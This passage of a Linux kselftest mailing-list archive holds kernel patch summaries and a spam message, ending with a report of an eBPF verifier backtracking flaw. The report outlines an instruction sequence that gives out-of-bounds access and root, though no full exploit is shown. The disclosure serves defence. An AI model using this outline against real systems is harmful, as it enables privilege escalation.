October 2023 - Linux-kselftest-mirror

[PATCH v2 1/4] selftests: capabilities: remove duplicate unneeded defines

by Muhammad Usama Anjum

These duplicate defines should automatically be picked up from kernel headers. Use KHDR_INCLUDES to add kernel header files. Signed-off-by: Muhammad Usama Anjum <usama.anjum(a)collabora.com> --- tools/testing/selftests/capabilities/Makefile | 2 +- tools/testing/selftests/capabilities/test_execve.c | 8 -------- tools/testing/selftests/capabilities/validate_cap.c | 8 -------- 3 files changed, 1 insertion(+), 17 deletions(-) diff --git a/tools/testing/selftests/capabilities/Makefile b/tools/testing/selftests/capabilities/Makefile index 6e9d98d457d5b..411ac098308f1 100644 --- a/tools/testing/selftests/capabilities/Makefile +++ b/tools/testing/selftests/capabilities/Makefile @@ -2,7 +2,7 @@ TEST_GEN_FILES := validate_cap TEST_GEN_PROGS := test_execve -CFLAGS += -O2 -g -std=gnu99 -Wall +CFLAGS += -O2 -g -std=gnu99 -Wall $(KHDR_INCLUDES) LDLIBS += -lcap-ng -lrt -ldl include ../lib.mk diff --git a/tools/testing/selftests/capabilities/test_execve.c b/tools/testing/selftests/capabilities/test_execve.c index df0ef02b40367..e3a352b020a79 100644 --- a/tools/testing/selftests/capabilities/test_execve.c +++ b/tools/testing/selftests/capabilities/test_execve.c @@ -20,14 +20,6 @@ #include "../kselftest.h" -#ifndef PR_CAP_AMBIENT -#define PR_CAP_AMBIENT 47 -# define PR_CAP_AMBIENT_IS_SET 1 -# define PR_CAP_AMBIENT_RAISE 2 -# define PR_CAP_AMBIENT_LOWER 3 -# define PR_CAP_AMBIENT_CLEAR_ALL 4 -#endif - static int nerrs; static pid_t mpid; /* main() pid is used to avoid duplicate test counts */ diff --git a/tools/testing/selftests/capabilities/validate_cap.c b/tools/testing/selftests/capabilities/validate_cap.c index cdfc94268fe6e..60b4e7b716a75 100644 --- a/tools/testing/selftests/capabilities/validate_cap.c +++ b/tools/testing/selftests/capabilities/validate_cap.c @@ -9,14 +9,6 @@ #include "../kselftest.h" -#ifndef PR_CAP_AMBIENT -#define PR_CAP_AMBIENT 47 -# define PR_CAP_AMBIENT_IS_SET 1 -# define PR_CAP_AMBIENT_RAISE 2 -# define PR_CAP_AMBIENT_LOWER 3 -# define PR_CAP_AMBIENT_CLEAR_ALL 4 -#endif - #if __GLIBC__ > 2 || (__GLIBC__ == 2 && __GLIBC_MINOR__ >= 19) # define HAVE_GETAUXVAL #endif -- 2.40.1

1 year, 8 months

2
5
0 0

[PATCH v3 0/3] userfaultfd move option

by Suren Baghdasaryan

This patch series introduces UFFDIO_MOVE feature to userfaultfd, which has long been implemented and maintained by Andrea in his local tree [1], but was not upstreamed due to lack of use cases where this approach would be better than allocating a new page and copying the contents. Previous upstraming attempts could be found at [6] and [7]. UFFDIO_COPY performs ~20% better than UFFDIO_MOVE when the application needs pages to be allocated [2]. However, with UFFDIO_MOVE, if pages are available (in userspace) for recycling, as is usually the case in heap compaction algorithms, then we can avoid the page allocation and memcpy (done by UFFDIO_COPY). Also, since the pages are recycled in the userspace, we avoid the need to release (via madvise) the pages back to the kernel [3]. We see over 40% reduction (on a Google pixel 6 device) in the compacting thread’s completion time by using UFFDIO_MOVE vs. UFFDIO_COPY. This was measured using a benchmark that emulates a heap compaction implementation using userfaultfd (to allow concurrent accesses by application threads). More details of the usecase are explained in [3]. Furthermore, UFFDIO_MOVE enables moving swapped-out pages without touching them within the same vma. Today, it can only be done by mremap, however it forces splitting the vma. Main changes since Andrea's last version [1]: - Trivial translations from page to folio, mmap_sem to mmap_lock - Replace pmd_trans_unstable() with pte_offset_map_nolock() and handle its possible failure - Move pte mapping into remap_pages_pte to allow for retries when source page or anon_vma is contended. Since pte_offset_map_nolock() start RCU read section, we can't block anymore after mapping a pte, so have to unmap the ptesm do the locking and retry. - Add and use anon_vma_trylock_write() to avoid blocking while in RCU read section. - Accommodate changes in mmu_notifier_range_init() API, switch to mmu_notifier_invalidate_range_start_nonblock() to avoid blocking while in RCU read section. - Open-code now removed __swp_swapcount() - Replace pmd_read_atomic() with pmdp_get_lockless() - Add new selftest for UFFDIO_MOVE Changes since v1 [4]: - add mmget_not_zero in userfaultfd_remap, per Jann Horn - removed extern from function definitions, per Matthew Wilcox - converted to folios in remap_pages_huge_pmd, per Matthew Wilcox - use PageAnonExclusive in remap_pages_huge_pmd, per David Hildenbrand - handle pgtable transfers between MMs, per Jann Horn - ignore concurrent A/D pte bit changes, per Jann Horn - split functions into smaller units, per David Hildenbrand - test for folio_test_large in remap_anon_pte, per Matthew Wilcox - use pte_swp_exclusive for swapcount check, per David Hildenbrand - eliminated use of mmu_notifier_invalidate_range_start_nonblock, per Jann Horn - simplified THP alignment checks, per Jann Horn - refactored the loop inside remap_pages, per Jann Horn - additional clarifying comments, per Jann Horn Changes since v2 [5]: - renamed UFFDIO_REMAP to UFFDIO_MOVE, per David Hildenbrand - rebase over mm-unstable to use folio_move_anon_rmap(), per David Hildenbrand - added text for manpage explaining DONTFORK and KSM requirements for this feature, per David Hildenbrand - check for anon_vma changes in the fast path of folio_lock_anon_vma_read, per Peter Xu - updated the title and description of the first patch, per David Hildenbrand - updating comments in folio_lock_anon_vma_read() explaining the need for anon_vma checks, per David Hildenbrand - changed all mapcount checks to PageAnonExclusive, per Jann Horn and David Hildenbrand - changed counters in remap_swap_pte() from MM_ANONPAGES to MM_SWAPENTS, per Jann Horn - added a check for PTE change after folio is locked in remap_pages_pte(), per Jann Horn - added handling of PMD migration entries and bailout when pmd_devmap(), per Jann Horn - added checks to ensure both src and dst VMAs are writable, per Peter Xu - added UFFD_FEATURE_MOVE, per Peter Xu - removed obsolete comments, per Peter Xu - renamed remap_anon_pte to remap_present_pte, per Peter Xu - added a comment for folio_get_anon_vma() explaining the need for anon_vma checks, per Peter Xu - changed error handling in remap_pages() to make it more clear, per Peter Xu - changed EFAULT to EAGAIN to retry when a hugepage appears or disappears from under us, per Peter Xu - added links to previous upstreaming attempts, per David Hildenbrand [1] https://gitlab.com/aarcange/aa/-/commit/2aec7aea56b10438a3881a20a411aa4b1fc… [2] https://lore.kernel.org/all/1425575884-2574-1-git-send-email-aarcange@redha… [3] https://lore.kernel.org/linux-mm/CA+EESO4uO84SSnBhArH4HvLNhaUQ5nZKNKXqxRCyj… [4] https://lore.kernel.org/all/20230914152620.2743033-1-surenb@google.com/ [5] https://lore.kernel.org/all/20230923013148.1390521-1-surenb@google.com/ [6] https://lore.kernel.org/all/1425575884-2574-21-git-send-email-aarcange@redh… [7] https://lore.kernel.org/all/cover.1547251023.git.blake.caldwell@colorado.ed… The patchset applies over mm-unstable. Andrea Arcangeli (2): mm/rmap: support move to different root anon_vma in folio_move_anon_rmap() userfaultfd: UFFDIO_MOVE uABI Suren Baghdasaryan (1): selftests/mm: add UFFDIO_MOVE ioctl test Documentation/admin-guide/mm/userfaultfd.rst | 3 + fs/userfaultfd.c | 63 ++ include/linux/rmap.h | 5 + include/linux/userfaultfd_k.h | 12 + include/uapi/linux/userfaultfd.h | 29 +- mm/huge_memory.c | 138 +++++ mm/khugepaged.c | 3 + mm/rmap.c | 30 + mm/userfaultfd.c | 602 +++++++++++++++++++ tools/testing/selftests/mm/uffd-common.c | 41 +- tools/testing/selftests/mm/uffd-common.h | 1 + tools/testing/selftests/mm/uffd-unit-tests.c | 62 ++ 12 files changed, 986 insertions(+), 3 deletions(-) -- 2.42.0.609.gbb76f46606-goog

1 year, 8 months

6
51
0 0

[RFC PATCH v1 0/8] Introduce mseal() syscall

by jeffxu＠chromium.org

From: Jeff Xu <jeffxu(a)google.com> This patchset proposes a new mseal() syscall for the Linux kernel. Modern CPUs support memory permissions such as RW and NX bits. Linux has supported NX since the release of kernel version 2.6.8 in August 2004 [1]. The memory permission feature improves security stance on memory corruption bugs, i.e. the attacker can’t just write to arbitrary memory and point the code to it, the memory has to be marked with X bit, or else an exception will happen. Memory sealing additionally protects the mapping itself against modifications. This is useful to mitigate memory corruption issues where a corrupted pointer is passed to a memory management syscall. For example, such an attacker primitive can break control-flow integrity guarantees since read-only memory that is supposed to be trusted can become writable or .text pages can get remapped. Memory sealing can automatically be applied by the runtime loader to seal .text and .rodata pages and applications can additionally seal security critical data at runtime. A similar feature already exists in the XNU kernel with the VM_FLAGS_PERMANENT [3] flag and on OpenBSD with the mimmutable syscall [4]. Also, Chrome wants to adopt this feature for their CFI work [2] and this patchset has been designed to be compatible with the Chrome use case. The new mseal() is an architecture independent syscall, and with following signature: mseal(void addr, size_t len, unsigned int types, unsigned int flags) addr/len: memory range. Must be continuous/allocated memory, or else mseal() will fail and no VMA is updated. For details on acceptable arguments, please refer to comments in mseal.c. Those are also fully covered by the selftest. types: bit mask to specify which syscall to seal, currently they are: MM_SEAL_MSEAL 0x1 MM_SEAL_MPROTECT 0x2 MM_SEAL_MUNMAP 0x4 MM_SEAL_MMAP 0x8 MM_SEAL_MREMAP 0x10 Each bit represents sealing for one specific syscall type, e.g. MM_SEAL_MPROTECT will deny mprotect syscall. The consideration of bitmask is that the API is extendable, i.e. when needed, the sealing can be extended to madvise, mlock, etc. Backward compatibility is also easy. The kernel will remember which seal types are applied, and the application doesn’t need to repeat all existing seal types in the next mseal(). Once a seal type is applied, it can’t be unsealed. Call mseal() on an existing seal type is a no-action, not a failure. MM_SEAL_MSEAL will deny mseal() calls that try to add a new seal type. Internally, vm_area_struct adds a new field vm_seals, to store the bit masks. For the affected syscalls, such as mprotect, a check(can_modify_mm) for sealing is added, this usually happens at the early point of the syscall, before any update is made to VMAs. The effect of that is: if any of the VMAs in the given address range fails the sealing check, none of the VMA will be updated. It might be worth noting that this is different from the rest of mprotect(), where some updates can happen even when mprotect returns fail. Consider can_modify_mm only checks vm_seals in vm_area_struct, and it is not going deeper in the page table or updating any HW, success or none behavior might fit better here. I would like to listen to the community's feedback on this. The idea that inspired this patch comes from Stephen Röttger’s work in V8 CFI [5], Chrome browser in ChromeOS will be the first user of this API. In addition, Stephen is working on glibc change to add sealing support into the dynamic linker to seal all non-writable segments at startup. When that work is completed, all applications can automatically benefit from these new protections. [1] https://kernelnewbies.org/Linux_2_6_8 [2] https://v8.dev/blog/control-flow-integrity [3] https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b… [4] https://man.openbsd.org/mimmutable.2 [5] https://docs.google.com/document/d/1O2jwK4dxI3nRcOJuPYkonhTkNQfbmwdvxQMyXge… Jeff Xu (8): Add mseal syscall Wire up mseal syscall mseal: add can_modify_mm and can_modify_vma mseal: seal mprotect mseal munmap mseal mremap mseal mmap selftest mm/mseal mprotect/munmap/mremap/mmap arch/alpha/kernel/syscalls/syscall.tbl | 1 + arch/arm/tools/syscall.tbl | 1 + arch/arm64/include/asm/unistd.h | 2 +- arch/arm64/include/asm/unistd32.h | 2 + arch/ia64/kernel/syscalls/syscall.tbl | 1 + arch/m68k/kernel/syscalls/syscall.tbl | 1 + arch/microblaze/kernel/syscalls/syscall.tbl | 1 + arch/mips/kernel/syscalls/syscall_n32.tbl | 1 + arch/mips/kernel/syscalls/syscall_n64.tbl | 1 + arch/mips/kernel/syscalls/syscall_o32.tbl | 1 + arch/parisc/kernel/syscalls/syscall.tbl | 1 + arch/powerpc/kernel/syscalls/syscall.tbl | 1 + arch/s390/kernel/syscalls/syscall.tbl | 1 + arch/sh/kernel/syscalls/syscall.tbl | 1 + arch/sparc/kernel/syscalls/syscall.tbl | 1 + arch/x86/entry/syscalls/syscall_32.tbl | 1 + arch/x86/entry/syscalls/syscall_64.tbl | 1 + arch/xtensa/kernel/syscalls/syscall.tbl | 1 + fs/aio.c | 5 +- include/linux/mm.h | 55 +- include/linux/mm_types.h | 7 + include/linux/syscalls.h | 2 + include/uapi/asm-generic/unistd.h | 5 +- include/uapi/linux/mman.h | 6 + ipc/shm.c | 3 +- kernel/sys_ni.c | 1 + mm/Kconfig | 8 + mm/Makefile | 1 + mm/internal.h | 4 +- mm/mmap.c | 49 +- mm/mprotect.c | 6 + mm/mremap.c | 19 +- mm/mseal.c | 328 +++++ mm/nommu.c | 6 +- mm/util.c | 8 +- tools/testing/selftests/mm/Makefile | 1 + tools/testing/selftests/mm/mseal_test.c | 1428 +++++++++++++++++++ 37 files changed, 1934 insertions(+), 28 deletions(-) create mode 100644 mm/mseal.c create mode 100644 tools/testing/selftests/mm/mseal_test.c -- 2.42.0.609.gbb76f46606-goog

1 year, 8 months

10
42
0 0

Wycena paneli fotowoltaicznych

by Kamil Lasek

Dzień dobry, dostrzegam możliwość współpracy z Państwa firmą. Świadczymy kompleksową obsługę inwestycji w fotowoltaikę, która obniża koszty energii elektrycznej. Czy są Państwo zainteresowani weryfikacją wstępnych propozycji? Pozdrawiam, Kamil Lasek

1 year, 8 months

1
0
0 0

[PATCH] selftests: bpf: add malloc failures checks in bpf_iter

by Yuran Pereira

Since some malloc calls in bpf_iter may at times fail, this patch adds the appropriate fail checks, and ensures that any previously allocated resource is appropriately destroyed before returning the function. Signed-off-by: Yuran Pereira <yuran.pereira(a)hotmail.com> --- tools/testing/selftests/bpf/prog_tests/bpf_iter.c | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/tools/testing/selftests/bpf/prog_tests/bpf_iter.c b/tools/testing/selftests/bpf/prog_tests/bpf_iter.c index 1f02168103dd..6d47ea9211a4 100644 --- a/tools/testing/selftests/bpf/prog_tests/bpf_iter.c +++ b/tools/testing/selftests/bpf/prog_tests/bpf_iter.c @@ -878,6 +878,11 @@ static void test_bpf_percpu_hash_map(void) skel->rodata->num_cpus = bpf_num_possible_cpus(); val = malloc(8 * bpf_num_possible_cpus()); + if (CHECK(!val, "malloc", "memory allocation failed: %s", + strerror(errno))) { + bpf_iter_bpf_percpu_hash_map__destroy(skel); + return; + } err = bpf_iter_bpf_percpu_hash_map__load(skel); if (!ASSERT_OK_PTR(skel, "bpf_iter_bpf_percpu_hash_map__load")) @@ -1057,6 +1062,11 @@ static void test_bpf_percpu_array_map(void) skel->rodata->num_cpus = bpf_num_possible_cpus(); val = malloc(8 * bpf_num_possible_cpus()); + if (CHECK(!val, "malloc", "memory allocation failed: %s", + strerror(errno))) { + bpf_iter_bpf_percpu_hash_map__destroy(skel); + return; + } err = bpf_iter_bpf_percpu_array_map__load(skel); if (!ASSERT_OK_PTR(skel, "bpf_iter_bpf_percpu_array_map__load")) -- 2.25.1

1 year, 8 months

2
1
0 0

[PATCH] selftests: add a sanity check for zswap

by Nhat Pham

We recently encountered a bug that makes all zswap store attempt fail. Specifically, after: "141fdeececb3 mm/zswap: delay the initialization of zswap" if we build a kernel with zswap disabled by default, then enabled after the swapfile is set up, the zswap tree will not be initialized. As a result, all zswap store calls will be short-circuited. We have to perform another swapon to get zswap working properly again. Fortunately, this issue has since been fixed by the patch that kills frontswap: "42c06a0e8ebe mm: kill frontswap" which performs zswap_swapon() unconditionally, i.e always initializing the zswap tree. This test add a sanity check that ensure zswap storing works as intended. Signed-off-by: Nhat Pham <nphamcs(a)gmail.com> --- tools/testing/selftests/cgroup/test_zswap.c | 48 +++++++++++++++++++++ 1 file changed, 48 insertions(+) diff --git a/tools/testing/selftests/cgroup/test_zswap.c b/tools/testing/selftests/cgroup/test_zswap.c index 49def87a909b..c99d2adaca3f 100644 --- a/tools/testing/selftests/cgroup/test_zswap.c +++ b/tools/testing/selftests/cgroup/test_zswap.c @@ -55,6 +55,11 @@ static int get_zswap_written_back_pages(size_t *value) return read_int("/sys/kernel/debug/zswap/written_back_pages", value); } +static long get_zswpout(const char *cgroup) +{ + return cg_read_key_long(cgroup, "memory.stat", "zswpout "); +} + static int allocate_bytes(const char *cgroup, void *arg) { size_t size = (size_t)arg; @@ -68,6 +73,48 @@ static int allocate_bytes(const char *cgroup, void *arg) return 0; } +/* + * Sanity test to check that pages are written into zswap. + */ +static int test_zswap_usage(const char *root) +{ + long zswpout_before, zswpout_after; + int ret = KSFT_FAIL; + char *test_group; + + /* Set up */ + test_group = cg_name(root, "no_shrink_test"); + if (!test_group) + goto out; + if (cg_create(test_group)) + goto out; + if (cg_write(test_group, "memory.max", "1M")) + goto out; + + zswpout_before = get_zswpout(test_group); + if (zswpout_before < 0) { + ksft_print_msg("Failed to get zswpout\n"); + goto out; + } + + /* Allocate more than memory.max to push memory into zswap */ + if (cg_run(test_group, allocate_bytes, (void *)MB(4))) + goto out; + + /* Verify that pages come into zswap */ + zswpout_after = get_zswpout(test_group); + if (zswpout_after <= zswpout_before) { + ksft_print_msg("zswpout does not increase after test program\n"); + goto out; + } + ret = KSFT_PASS; + +out: + cg_destroy(test_group); + free(test_group); + return ret; +} + /* * When trying to store a memcg page in zswap, if the memcg hits its memory * limit in zswap, writeback should not be triggered. @@ -235,6 +282,7 @@ struct zswap_test { int (*fn)(const char *root); const char *name; } tests[] = { + T(test_zswap_usage), T(test_no_kmem_bypass), T(test_no_invasive_cgroup_shrink), }; -- 2.34.1

1 year, 8 months

2
1
0 0

[PATCH v6 0/8] Add Intel VT-d nested translation (part 1/2)

by Yi Liu

This is the first part to add Intel VT-d nested translation based on IOMMUFD nesting infrastructure. As the iommufd nesting infrastructure series[1], iommu core supports new ops to allocate domains with user data. For nesting, the user data is vendor-specific, IOMMU_HWPT_DATA_VTD_S1 is defined for the Intel VT-d stage-1 page table, it will be used in the stage-1 domain allocation path. struct iommu_hwpt_vtd_s1 is defined to pass user_data for the Intel VT-d stage-1 domain allocation. This series does not have the cache invalidation path, it would be added in part 2/2. The first Intel platform supporting nested translation is Sapphire Rapids which, unfortunately, has a hardware errata [2] requiring special treatment. This errata happens when a stage-1 page table page (either level) is located in a stage-2 read-only region. In that case the IOMMU hardware may ignore the stage-2 RO permission and still set the A/D bit in stage-1 page table entries during page table walking. A flag IOMMU_HW_INFO_VTD_ERRATA_772415_SPR17 is introduced to report this errata to userspace. With that restriction the user should either disable nested translation to favor RO stage-2 mappings or ensure no RO stage-2 mapping to enable nested translation. Intel-iommu driver is armed with necessary checks to prevent such mix in patch8 of this series. Qemu currently does add RO mappings though. The vfio agent in Qemu simply maps all valid regions in the GPA address space which certainly includes RO regions e.g. vbios. In reality we don't know a usage relying on DMA reads from the BIOS region. Hence finding a way to skip RO regions (e.g. via a discard manager) in Qemu might be an acceptable tradeoff. The actual change needs more discussion in Qemu community. For now we just hacked Qemu to test. Complete code can be found in [3], corresponding QEMU could can be found in [4]. [1] https://lore.kernel.org/linux-iommu/20231020091946.12173-1-yi.l.liu@intel.c… [2] https://www.intel.com/content/www/us/en/content-details/772415/content-deta… [3] https://github.com/yiliu1765/iommufd/tree/iommufd_nesting [4] https://github.com/yiliu1765/qemu/tree/zhenzhong/wip/iommufd_nesting_rfcv1 Change log: v6: - Add Kevin's r-b for patch 1 and 8 - Drop Kevin's r-b for patch 7 - Address comments from Kevin - Split the VT-d nesting series into two parts 1/2 and 2/2 v5: https://lore.kernel.org/linux-iommu/20230921075431.125239-1-yi.l.liu@intel.… - Add Kevin's r-b for patch 2, 3 ,5 8, 10 - Drop enforce_cache_coherency callback from the nested type domain ops (Kevin) - Remove duplicate agaw check in patch 04 (Kevin) - Remove duplicate domain_update_iommu_cap() in patch 06 (Kevin) - Check parent's force_snooping to set pgsnp in the pasid entry (Kevin) - uapi data structure check (Kevin) - Simplify the errata handling as user can allocate nested parent domain v4: https://lore.kernel.org/linux-iommu/20230724111335.107427-1-yi.l.liu@intel.… - Remove ascii art tables (Jason) - Drop EMT (Tina, Jason) - Drop MTS and related definitions (Kevin) - Rename macro IOMMU_VTD_PGTBL_ to IOMMU_VTD_S1_ (Kevin) - Rename struct iommu_hwpt_intel_vtd_ to iommu_hwpt_vtd_ (Kevin) - Rename struct iommu_hwpt_intel_vtd to iommu_hwpt_vtd_s1 (Kevin) - Put the vendor specific hwpt alloc data structure before enuma iommu_hwpt_type (Kevin) - Do not trim the higher page levels of S2 domain in nested domain attachment as the S2 domain may have been used independently. (Kevin) - Remove the first-stage pgd check against the maximum address of s2_domain as hw can check it anyhow. It makes sense to check every pfns used in the stage-1 page table. But it cannot make it. So just leave it to hw. (Kevin) - Split the iotlb flush part into an order of uapi, helper and callback implementation (Kevin) - Change the policy of VT-d nesting errata, disallow RO mapping once a domain is used as parent domain of a nested domain. This removes the nested_users counting. (Kevin) - Minor fix for "make htmldocs" v3: https://lore.kernel.org/linux-iommu/20230511145110.27707-1-yi.l.liu@intel.c… - Further split the patches into an order of adding helpers for nested domain, iotlb flush, nested domain attachment and nested domain allocation callback, then report the hw_info to userspace. - Add batch support in cache invalidation from userspace - Disallow nested translation usage if RO mappings exists in stage-2 domain due to errata on readonly mappings on Sapphire Rapids platform. v2: https://lore.kernel.org/linux-iommu/20230309082207.612346-1-yi.l.liu@intel.… - The iommufd infrastructure is split to be separate series. v1: https://lore.kernel.org/linux-iommu/20230209043153.14964-1-yi.l.liu@intel.c… Regards, Yi Liu Lu Baolu (5): iommu/vt-d: Extend dmar_domain to support nested domain iommu/vt-d: Add helper for nested domain allocation iommu/vt-d: Add helper to setup pasid nested translation iommu/vt-d: Add nested domain allocation iommu/vt-d: Disallow read-only mappings to nest parent domain Yi Liu (3): iommufd: Add data structure for Intel VT-d stage-1 domain allocation iommu/vt-d: Make domain attach helpers to be extern iommu/vt-d: Set the nested domain to a device drivers/iommu/intel/Makefile | 2 +- drivers/iommu/intel/iommu.c | 63 +++++++++++++------- drivers/iommu/intel/iommu.h | 46 ++++++++++++-- drivers/iommu/intel/nested.c | 109 ++++++++++++++++++++++++++++++++++ drivers/iommu/intel/pasid.c | 112 +++++++++++++++++++++++++++++++++++ drivers/iommu/intel/pasid.h | 2 + include/uapi/linux/iommufd.h | 42 ++++++++++++- 7 files changed, 348 insertions(+), 28 deletions(-) create mode 100644 drivers/iommu/intel/nested.c -- 2.34.1

1 year, 8 months

3
17
0 0

[PATCH v4 00/17] iommufd: Add nesting infrastructure

by Yi Liu

Nested translation is a hardware feature that is supported by many modern IOMMU hardwares. It has two stages (stage-1, stage-2) address translation to get access to the physical address. stage-1 translation table is owned by userspace (e.g. by a guest OS), while stage-2 is owned by kernel. Changes to stage-1 translation table should be followed by an IOTLB invalidation. Take Intel VT-d as an example, the stage-1 translation table is I/O page table. As the below diagram shows, guest I/O page table pointer in GPA (guest physical address) is passed to host and be used to perform the stage-1 address translation. Along with it, modifications to present mappings in the guest I/O page table should be followed with an IOTLB invalidation. .-------------. .---------------------------. | vIOMMU | | Guest I/O page table | | | '---------------------------' .----------------/ | PASID Entry |--- PASID cache flush --+ '-------------' | | | V | | I/O page table pointer in GPA '-------------' Guest ------| Shadow |---------------------------|-------- v v v Host .-------------. .------------------------. | pIOMMU | | FS for GIOVA->GPA | | | '------------------------' .----------------/ | | PASID Entry | V (Nested xlate) '----------------\.----------------------------------. | | | SS for GPA->HPA, unmanaged domain| | | '----------------------------------' '-------------' Where: - FS = First stage page tables - SS = Second stage page tables <Intel VT-d Nested translation> In IOMMUFD, all the translation tables are tracked by hw_pagetable (hwpt) and each has an iommu_domain allocated from iommu driver. So in this series hw_pagetable and iommu_domain means the same thing if no special note. IOMMUFD has already supported allocating hw_pagetable that is linked with an IOAS. However, nesting requires IOMMUFD to allow allocating hw_pagetable with driver specific parameters and interface to sync stage-1 IOTLB as user owns the stage-1 translation table. This series is based on the iommu hw info reporting series [1]. It first extends domain_alloc_user to allocate domains with user data and adds new op for invalidate stage-1 IOTLB for user-managed domains, then extends the IOMMUFD internal infrastructure to accept user_data and parent hwpt, relay the user_data/parent to iommu core to allocate user-managed iommu_domain. After it, extends the ioctl IOMMU_HWPT_ALLOC to accept user data and stage-2 hwpt ID. Along with it, ioctl IOMMU_HWPT_INVALIDATE is added to invalidate stage-1 IOTLB. This is needed for user-managed hwpts. Selftest is added as well to cover the new ioctls. Complete code can be found in [2], QEMU could can be found in [3]. At last, this is a team work together with Nicolin Chen, Lu Baolu. Thanks them for the help. ^_^. Look forward to your feedbacks. [1] https://lore.kernel.org/linux-iommu/20230818101033.4100-1-yi.l.liu@intel.co… - merged [2] https://github.com/yiliu1765/iommufd/tree/iommufd_nesting [3] https://github.com/yiliu1765/qemu/tree/zhenzhong/wip/iommufd_nesting_rfcv1 Change log: v4: - Separate HWPT alloc/destroy/abort functions between user-managed HWPTs and kernel-managed HWPTs - Rework invalidate uAPI to be a multi-request array-based design - Add a struct iommu_user_data_array and a helper for driver to sanitize and copy the entry data from user space invalidation array - Add a patch fixing TEST_LENGTH() in selftest program - Drop IOMMU_RESV_IOVA_RANGES patches - Update kdoc and inline comments - Drop the code to add IOMMU_RESV_SW_MSI to kernel-managed HWPT in nested translation, this does not change the rule that resv regions should only be added to the kernel-managed HWPT. The IOMMU_RESV_SW_MSI stuff will be added in later series as it is needed only by SMMU so far. v3: https://lore.kernel.org/linux-iommu/20230724110406.107212-1-yi.l.liu@intel.… - Add new uAPI things in alphabetical order - Pass in "enum iommu_hwpt_type hwpt_type" to op->domain_alloc_user for sanity, replacing the previous op->domain_alloc_user_data_len solution - Return ERR_PTR from domain_alloc_user instead of NULL - Only add IOMMU_RESV_SW_MSI to kernel-managed HWPT in nested translation (Kevin) - Add IOMMU_RESV_IOVA_RANGES to report resv iova ranges to userspace hence userspace is able to exclude the ranges in the stage-1 HWPT (e.g. guest I/O page table). (Kevin) - Add selftest coverage for the new IOMMU_RESV_IOVA_RANGES ioctl - Minor changes per Kevin's inputs v2: https://lore.kernel.org/linux-iommu/20230511143844.22693-1-yi.l.liu@intel.c… - Add union iommu_domain_user_data to include all user data structures to avoid passing void * in kernel APIs. - Add iommu op to return user data length for user domain allocation - Rename struct iommu_hwpt_alloc::data_type to be hwpt_type - Store the invalidation data length in iommu_domain_ops::cache_invalidate_user_data_len - Convert cache_invalidate_user op to be int instead of void - Remove @data_type in struct iommu_hwpt_invalidate - Remove out_hwpt_type_bitmap in struct iommu_hw_info hence drop patch 08 of v1 v1: https://lore.kernel.org/linux-iommu/20230309080910.607396-1-yi.l.liu@intel.… Thanks, Yi Liu Lu Baolu (1): iommu: Add nested domain support Nicolin Chen (12): iommufd: Unite all kernel-managed members into a struct iommufd: Separate kernel-managed HWPT alloc/destroy/abort functions iommufd: Add shared alloc_fn function pointer and mutex pointer iommufd: Add user-managed hw_pagetable support iommufd: Always setup MSI and anforce cc on kernel-managed domains iommufd/device: Add helpers to enforce/remove device reserved regions iommufd/selftest: Rework TEST_LENGTH to test min_size explicitly iommufd/selftest: Add nested domain allocation for mock domain iommufd/selftest: Add coverage for IOMMU_HWPT_ALLOC with nested HWPTs iommufd/selftest: Add mock_domain_cache_invalidate_user support iommufd/selftest: Add IOMMU_TEST_OP_MD_CHECK_IOTLB test op iommufd/selftest: Add coverage for IOMMU_HWPT_INVALIDATE ioctl Yi Liu (4): iommu: Add hwpt_type with user_data for domain_alloc_user op iommufd: Pass in hwpt_type/user_data to iommufd_hw_pagetable_alloc() iommufd: Support IOMMU_HWPT_ALLOC allocation with user data iommufd: Add IOMMU_HWPT_INVALIDATE drivers/iommu/intel/iommu.c | 5 +- drivers/iommu/iommufd/device.c | 51 +++- drivers/iommu/iommufd/hw_pagetable.c | 257 ++++++++++++++++-- drivers/iommu/iommufd/iommufd_private.h | 59 +++- drivers/iommu/iommufd/iommufd_test.h | 40 +++ drivers/iommu/iommufd/main.c | 3 + drivers/iommu/iommufd/selftest.c | 184 ++++++++++++- include/linux/iommu.h | 110 +++++++- include/uapi/linux/iommufd.h | 60 +++- tools/testing/selftests/iommu/iommufd.c | 209 +++++++++++++- .../selftests/iommu/iommufd_fail_nth.c | 3 +- tools/testing/selftests/iommu/iommufd_utils.h | 91 ++++++- 12 files changed, 998 insertions(+), 74 deletions(-) -- 2.34.1

1 year, 8 months

7
105
0 0

[PATCH] Incorrect backtracking for load/store or atomic ops

by Tao Lyu

Hi, I found the backtracking logic of the eBPF verifier is flawed when meeting 1) normal load and store instruction or 2) atomic memory instructions. # Normal load and store Here, I show one case about the normal load and store instructions, which can be exploited to achieve arbitrary read and write with two requirements: 1) The uploading program should have at least CAP_BPF, which is required for most eBPF applications. 2) Disable CPU mitigations by adding "mitigations=off" in the kernel booting command line. Otherwise, the Spectre mitigation in the eBPF verifier will prevent exploitation. 1: r3 = r10 (stack pointer) 3: if cond / \ / \ 4: *(u64 *)(r3 -120) = 200 6: *(u64 *)(r3 -120) = arbitrary offset to r2 verification state 1 verification state 2 (prune point) \ / \ / 7: r6 = *(u64 *)(r1 -120) ... 17: r7 = a map pointer 18: r7 += r6 // Out-of-bound access from the right side path Give an eBPF program (tools/testing/selftests/bpf/test_precise.c) whose simplified control flow graph looks like the above. When the verifier goes through the first (left-side) path and reaches insn 18, it will backtrack on register 6 like below. 18: (0f) r7 += r6 mark_precise: frame0: last_idx 18 first_idx 17 subseq_idx -1 mark_precise: frame0: regs=r6 stack= before 17: (bf) r7 = r0 ... mark_precise: frame0: regs=r6 stack= before 7: (79) r6 = *(u64 *)(r3 -120) However, the backtracking process is problematic when it reaches insn 7. Insn 7 is to load a value from the stack, but the stack pointer is represented by r3 instead of r10. ** In this case, the verifier (as shown below) will reset the precision on r6 and not mark the precision on the stack. ** Afterward, the backtracking finishes without annotating any registers in any verifier states. else if (class == BPF_LDX) { if (!bt_is_reg_set(bt, dreg)) return 0; bt_clear_reg(bt, dreg); if (insn->src_reg != BPF_REG_FP) return 0; ... } Finally, when the second (left-side) path reaches insn 7 again, it will compare the verifier states with the previous one. However, it realizes these two states are equal because no precision is on r6, thus the eBPF program an easily pass the verifier although the second path contains an invalid access offset. We have successfully exploited this bug for getting the root privilege. If needed, we can share the exploitation. BTW, when using the similar instructions in sub_prog can also trigger an assertion in the verifier: "[ 1510.165537] verifier backtracking bug [ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50" IMO, to 